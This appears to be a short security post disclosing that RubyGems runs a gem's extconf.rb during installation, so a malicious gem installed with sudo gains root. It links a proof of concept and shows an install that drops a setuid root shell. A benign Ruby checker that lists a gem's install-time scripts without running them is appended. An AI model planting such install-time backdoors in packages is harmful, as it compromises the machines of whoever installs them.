Another hilarious and trivial rubygems exploit. The file `ext/<ext>/extconf.rb`
is executed during installation, which means it runs as root when the gem is
installed with `sudo`. A malicious gem could put code in there that installs a
backdoor.
Demonstration PoC: https://github.com/m4rkw/rubygems-poc2
```
$ ls -la /tmp/lol
ls: cannot access /tmp/lol: No such file or directory
$ sudo gem install file-4.3.2.gem
Building native extensions. This could take a while...
Successfully installed file-4.3.2
Parsing documentation for file-4.3.2
Done installing documentation for file after 0 seconds
1 gem installed
$ /tmp/lol
# id
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)
#
```
Again, be *very* careful what gems you install!
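
A pre-install check for the behaviour described above, as an added example (not part of the original post or of RubyGems itself): it reads a `.gem` file and returns the source of every build script the gem declares, which is the code `gem install` would run, without executing any of it. The `demo_ext` gem and the helper names `install_time_scripts` and `build_sample_gem` are constructed for illustration.

```ruby
require "rubygems/package"
require "tmpdir"
require "fileutils"

# Return {path => source} for every build script RubyGems would run while
# installing the .gem at gem_path. Files are only unpacked, never executed.
def install_time_scripts(gem_path)
  pkg = Gem::Package.new(gem_path)
  scripts = pkg.spec.extensions            # e.g. ["ext/<ext>/extconf.rb"]
  return {} if scripts.empty?
  Dir.mktmpdir do |dir|
    pkg.extract_files(dir)                 # unpack only, no build step
    scripts.to_h { |s| [s, File.read(File.join(dir, s))] }
  end
end

# Constructed sample input: a harmless gem with one native-extension script.
def build_sample_gem(workdir)
  Dir.chdir(workdir) do
    FileUtils.mkdir_p("ext/demo_ext")
    File.write("ext/demo_ext/extconf.rb",
               "require 'mkmf'\ncreate_makefile('demo_ext')\n")
    spec = Gem::Specification.new do |s|
      s.name       = "demo_ext"            # hypothetical gem name
      s.version    = "0.0.1"
      s.summary    = "constructed sample"
      s.authors    = ["example"]
      s.files      = ["ext/demo_ext/extconf.rb"]
      s.extensions = ["ext/demo_ext/extconf.rb"]
    end
    # Second argument skips spec validation for this throwaway sample.
    File.join(workdir, Gem::Package.build(spec, true))
  end
end

if $PROGRAM_NAME == __FILE__
  Dir.mktmpdir do |dir|
    install_time_scripts(build_sample_gem(dir)).each do |path, source|
      puts "== runs at install time: #{path}", source
    end
  end
end
```

An empty result means the gem declares no native extensions; anything it does return should be read before running `gem install`, especially under `sudo`.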